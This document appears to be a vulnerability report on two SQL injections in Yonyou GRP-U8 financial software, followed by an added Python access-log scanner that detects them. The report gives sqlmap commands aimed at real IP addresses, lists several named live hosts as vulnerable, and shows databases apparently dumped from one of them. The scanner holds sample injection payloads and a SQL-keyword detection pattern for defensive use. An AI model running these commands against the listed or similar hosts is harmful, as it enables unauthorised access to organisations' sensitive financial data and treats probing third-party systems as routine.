### Brief description:
Two high-risk SQL injections in an important Yonyou system
### Details:
The system is the Yonyou GRP-U8 financial management software, which handles a large amount of sensitive information.
```
/IMLoginServlet?uid=1&pwd=1
/persionTreeServlet?bmdm=1
```
# SQL injection 1
/IMLoginServlet?uid=1&pwd=1
sqlmap.py -u "http://61.139.105.105:8008/IMLoginServlet?uid=1&pwd=1"
[![1.png](https://images.seebug.org/upload/201504/18224852cf450d28043305681539b5b3a260b584.png)](https://images.seebug.org/upload/201504/18224852cf450d28043305681539b5b3a260b584.png)
# SQL injection 2
sqlmap.py -u "http://61.139.105.105:8008/persionTreeServlet?bmdm=1"
[![2.png](https://images.seebug.org/upload/201504/182250324a298e29f29d2ad7650da5c928b8cb7e.png)](https://images.seebug.org/upload/201504/182250324a298e29f29d2ad7650da5c928b8cb7e.png)
5 cases:
http://61.139.105.105:8008
http://124.128.96.98:8001
http://www.jmsxc.com:7001
http://210.44.112.101
http://210.41.128.120:8002
http://web72283.5udns.cn
### Vulnerability proof:
Data dumped by sqlmap
sqlmap.py -u "http://61.139.105.105:8008/persionTreeServlet?bmdm=1" --dbs
[![data.png](https://images.seebug.org/upload/201504/18225124e55d66a8a80726d5aef6e687b0a0be1e.png)](https://images.seebug.org/upload/201504/18225124e55d66a8a80726d5aef6e687b0a0be1e.png)
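As an added defensive example (not code from the original report or from Yonyou), the script below scans web-server access-log lines for requests to the two injectable servlets named above whose `uid`, `pwd` or `bmdm` values carry SQL metacharacters, or that arrive with a sqlmap user agent. The log lines, client IPs and payload values are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format); the hosts,
# timestamps and payloads are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Apr/2015:22:48:52 +0800] "GET /IMLoginServlet?uid=1&pwd=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [18/Apr/2015:22:48:53 +0800] "GET /IMLoginServlet?uid=1%27%20AND%201%3D1--&pwd=1 HTTP/1.1" 200 512 "-" "sqlmap/1.0-dev"
10.0.0.7 - - [18/Apr/2015:22:50:32 +0800] "GET /persionTreeServlet?bmdm=1 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [18/Apr/2015:22:50:33 +0800] "GET /persionTreeServlet?bmdm=1%20WAITFOR%20DELAY%20%270:0:5%27 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [18/Apr/2015:22:51:24 +0800] "GET /index.jsp HTTP/1.1" 200 100 "-" "Mozilla/5.0"
"""

# The two servlets from the report and the parameters it identifies as injectable.
WATCHED_PARAMS = {"/IMLoginServlet": {"uid", "pwd"}, "/persionTreeServlet": {"bmdm"}}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Heuristic: a quote, comment marker, statement separator or SQL keyword in the value.
SQLI_RE = re.compile(r"('|--|/\*|;|\b(and|or|union|select|waitfor|sleep|benchmark)\b)", re.IGNORECASE)


def scan_access_log(text):
    """Return one finding per request that hits a watched servlet with a suspicious value or tool UA."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log format; skip rather than guess
        url = urlsplit(m.group("target"))
        params = WATCHED_PARAMS.get(url.path)
        if params is None:
            continue  # request to some other path
        qs = parse_qs(url.query, keep_blank_values=True)  # URL-decodes %27, %20 etc.
        reasons = []
        for name in sorted(params):
            for value in qs.get(name, []):
                if SQLI_RE.search(value):
                    reasons.append(f"{name}={value!r}")
        if m.group("ua").lower().startswith("sqlmap"):
            reasons.append("user-agent sqlmap")
        if reasons:
            findings.append({"ip": m.group("ip"), "path": url.path, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```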